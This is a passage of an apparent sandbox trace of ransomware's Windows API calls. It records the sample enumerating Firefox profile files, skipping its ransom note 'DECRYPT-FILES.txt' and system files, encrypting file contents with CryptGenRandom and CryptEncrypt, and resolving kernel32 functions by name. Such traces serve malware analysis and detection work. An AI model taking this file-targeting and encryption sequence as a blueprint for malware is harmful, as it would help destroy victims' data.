ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac4c7340, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xce3, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarks-2017-06-05_5.json.CMOvhG", cAlternateFileName="BOOKMA~1.CMO")) returned 1 [0184.015] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json.CMOvhG", lpString2="DECRYPT-FILES.txt") returned -1 [0184.015] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json.CMOvhG", lpString2="autorun.inf") returned 1 [0184.015] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json.CMOvhG", lpString2="boot.ini") returned -1 [0184.015] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json.CMOvhG", lpString2="desktop.ini") returned -1 [0184.016] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json.CMOvhG", lpString2="ntuser.dat") returned -1 [0184.016] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json.CMOvhG", lpString2="iconcache.db") returned -1 [0184.016] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json.CMOvhG", lpString2="bootsect.bak") returned -1 [0184.016] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json.CMOvhG", lpString2="ntuser.dat.log") returned -1 [0184.016] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json.CMOvhG", lpString2="thumbs.db") returned -1 [0184.016] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json.CMOvhG", lpString2="Bootfont.bin") returned -1 [0184.016] lstrlenW (lpString="bookmarks-2017-06-05_5.json.CMOvhG") returned 34 [0184.016] lstrcmpiW (lpString1="CMOvhG", lpString2="lnk") returned -1 [0184.016] lstrcmpiW (lpString1="CMOvhG", lpString2="exe") returned -1 [0184.016] lstrcmpiW (lpString1="CMOvhG", lpString2="sys") returned -1 [0184.016] lstrcmpiW (lpString1="CMOvhG", lpString2="dll") returned -1 [0184.016] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0184.016] lstrlenW (lpString="bookmarks-2017-06-05_5.json.CMOvhG") returned 34 [0184.016] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0184.016] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="bookmarks-2017-06-05_5.json.CMOvhG" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.CMOvhG") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.CMOvhG" [0184.016] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.016] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.CMOvhG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.cmovhg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0184.017] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x36fd5b8 | out: lpFileSize=0x36fd5b8*=3299) returned 1 [0184.017] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0184.017] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.039] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.039] CloseHandle (hObject=0x290) returned 1 [0184.039] CloseHandle (hObject=0x28c) returned 1 [0184.039] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.039] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85017d10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x85017d10, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xac539760, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xce3, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarks-2017-06-16_5.json.qSwZ2Up", cAlternateFileName="BOOKMA~1.QSW")) returned 1 [0184.039] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json.qSwZ2Up", lpString2="DECRYPT-FILES.txt") returned -1 [0184.039] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json.qSwZ2Up", lpString2="autorun.inf") returned 1 [0184.039] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json.qSwZ2Up", lpString2="boot.ini") returned -1 [0184.039] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json.qSwZ2Up", lpString2="desktop.ini") returned -1 [0184.039] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json.qSwZ2Up", lpString2="ntuser.dat") returned -1 [0184.039] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json.qSwZ2Up", lpString2="iconcache.db") returned -1 [0184.039] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json.qSwZ2Up", lpString2="bootsect.bak") returned -1 [0184.039] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json.qSwZ2Up", lpString2="ntuser.dat.log") returned -1 [0184.040] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json.qSwZ2Up", lpString2="thumbs.db") returned -1 [0184.040] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json.qSwZ2Up", lpString2="Bootfont.bin") returned -1 [0184.040] lstrlenW (lpString="bookmarks-2017-06-16_5.json.qSwZ2Up") returned 35 [0184.040] lstrcmpiW (lpString1="qSwZ2Up", lpString2="lnk") returned 1 [0184.040] lstrcmpiW (lpString1="qSwZ2Up", lpString2="exe") returned 1 [0184.040] lstrcmpiW (lpString1="qSwZ2Up", lpString2="sys") returned -1 [0184.040] lstrcmpiW (lpString1="qSwZ2Up", lpString2="dll") returned 1 [0184.040] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0184.040] lstrlenW (lpString="bookmarks-2017-06-16_5.json.qSwZ2Up") returned 35 [0184.040] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0184.040] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="bookmarks-2017-06-16_5.json.qSwZ2Up" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.qSwZ2Up") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.qSwZ2Up" [0184.040] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.040] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.qSwZ2Up" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.qswz2up"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0184.040] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x36fd5b8 | out: lpFileSize=0x36fd5b8*=3299) returned 1 [0184.041] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0184.041] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.042] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.042] CloseHandle (hObject=0x290) returned 1 [0184.042] CloseHandle (hObject=0x28c) returned 1 [0184.042] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.042] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac47b080, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac47b080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac47b080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.042] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.043] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac47b080, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac47b080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac47b080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0184.043] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0184.043] CloseHandle (hObject=0x284) returned 1 [0184.043] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb47c9bf0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb47c9bf0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac585a20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10108, dwReserved0=0x0, dwReserved1=0x0, cFileName="cert8.db.e6NbJ", cAlternateFileName="CERT8D~1.E6N")) returned 1 [0184.043] lstrcmpiW (lpString1="cert8.db.e6NbJ", lpString2="DECRYPT-FILES.txt") returned -1 [0184.043] lstrcmpiW (lpString1="cert8.db.e6NbJ", lpString2="autorun.inf") returned 1 [0184.043] lstrcmpiW (lpString1="cert8.db.e6NbJ", lpString2="boot.ini") returned 1 [0184.043] lstrcmpiW (lpString1="cert8.db.e6NbJ", lpString2="desktop.ini") returned -1 [0184.043] lstrcmpiW (lpString1="cert8.db.e6NbJ", lpString2="ntuser.dat") returned -1 [0184.043] lstrcmpiW (lpString1="cert8.db.e6NbJ", lpString2="iconcache.db") returned -1 [0184.043] lstrcmpiW (lpString1="cert8.db.e6NbJ", lpString2="bootsect.bak") returned 1 [0184.043] lstrcmpiW (lpString1="cert8.db.e6NbJ", lpString2="ntuser.dat.log") returned -1 [0184.043] lstrcmpiW (lpString1="cert8.db.e6NbJ", lpString2="thumbs.db") returned -1 [0184.043] lstrcmpiW (lpString1="cert8.db.e6NbJ", lpString2="Bootfont.bin") returned 1 [0184.043] lstrlenW (lpString="cert8.db.e6NbJ") returned 14 [0184.043] lstrcmpiW (lpString1="e6NbJ", lpString2="lnk") returned -1 [0184.043] lstrcmpiW (lpString1="e6NbJ", lpString2="exe") returned -1 [0184.043] lstrcmpiW (lpString1="e6NbJ", lpString2="sys") returned -1 [0184.043] lstrcmpiW (lpString1="e6NbJ", lpString2="dll") returned 1 [0184.043] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.043] lstrlenW (lpString="cert8.db.e6NbJ") returned 14 [0184.043] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.043] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="cert8.db.e6NbJ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.e6NbJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.e6NbJ" [0184.043] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.044] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.e6NbJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db.e6nbj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.044] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=65800) returned 1 [0184.044] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.044] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.045] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.045] CloseHandle (hObject=0x288) returned 1 [0184.045] CloseHandle (hObject=0x284) returned 1 [0184.045] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.046] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac5abb80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="compatibility.ini.h4wDq", cAlternateFileName="COMPAT~1.H4W")) returned 1 [0184.046] lstrcmpiW (lpString1="compatibility.ini.h4wDq", lpString2="DECRYPT-FILES.txt") returned -1 [0184.046] lstrcmpiW (lpString1="compatibility.ini.h4wDq", lpString2="autorun.inf") returned 1 [0184.046] lstrcmpiW (lpString1="compatibility.ini.h4wDq", lpString2="boot.ini") returned 1 [0184.046] lstrcmpiW (lpString1="compatibility.ini.h4wDq", lpString2="desktop.ini") returned -1 [0184.046] lstrcmpiW (lpString1="compatibility.ini.h4wDq", lpString2="ntuser.dat") returned -1 [0184.046] lstrcmpiW (lpString1="compatibility.ini.h4wDq", lpString2="iconcache.db") returned -1 [0184.046] lstrcmpiW (lpString1="compatibility.ini.h4wDq", lpString2="bootsect.bak") returned 1 [0184.046] lstrcmpiW (lpString1="compatibility.ini.h4wDq", lpString2="ntuser.dat.log") returned -1 [0184.046] lstrcmpiW (lpString1="compatibility.ini.h4wDq", lpString2="thumbs.db") returned -1 [0184.046] lstrcmpiW (lpString1="compatibility.ini.h4wDq", lpString2="Bootfont.bin") returned 1 [0184.046] lstrlenW (lpString="compatibility.ini.h4wDq") returned 23 [0184.046] lstrcmpiW (lpString1="h4wDq", lpString2="lnk") returned -1 [0184.046] lstrcmpiW (lpString1="h4wDq", lpString2="exe") returned 1 [0184.046] lstrcmpiW (lpString1="h4wDq", lpString2="sys") returned -1 [0184.046] lstrcmpiW (lpString1="h4wDq", lpString2="dll") returned 1 [0184.046] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.046] lstrlenW (lpString="compatibility.ini.h4wDq") returned 23 [0184.046] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.046] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="compatibility.ini.h4wDq" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.h4wDq") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.h4wDq" [0184.046] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.046] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.h4wDq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini.h4wdq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.047] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=470) returned 1 [0184.047] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.047] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.047] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0184.047] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0184.047] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0184.048] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0184.048] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0184.048] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.049] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.049] CloseHandle (hObject=0x288) returned 1 [0184.049] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.049] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0184.050] CloseHandle (hObject=0x0) returned 0 [0184.050] CloseHandle (hObject=0x284) returned 1 [0184.050] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.050] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.051] GetTickCount () returned 0x1135429 [0184.051] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.051] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0184.051] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0184.051] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0184.051] lstrlenA (lpString="kernel32.dll") returned 12 [0184.051] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0184.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0184.051] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0184.052] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0184.052] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0184.052] lstrlenA (lpString="ADDATOMA") returned 8 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0184.052] lstrlenA (lpString="ADDATOMW") returned 8 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0184.052] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0184.052] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0184.052] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0184.052] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0184.052] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0184.052] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0184.052] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0184.052] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0184.052] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0184.052] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0184.052] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0184.052] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0184.052] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0184.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0184.053] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0184.053] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0184.053] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0184.053] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0184.053] lstrlenA 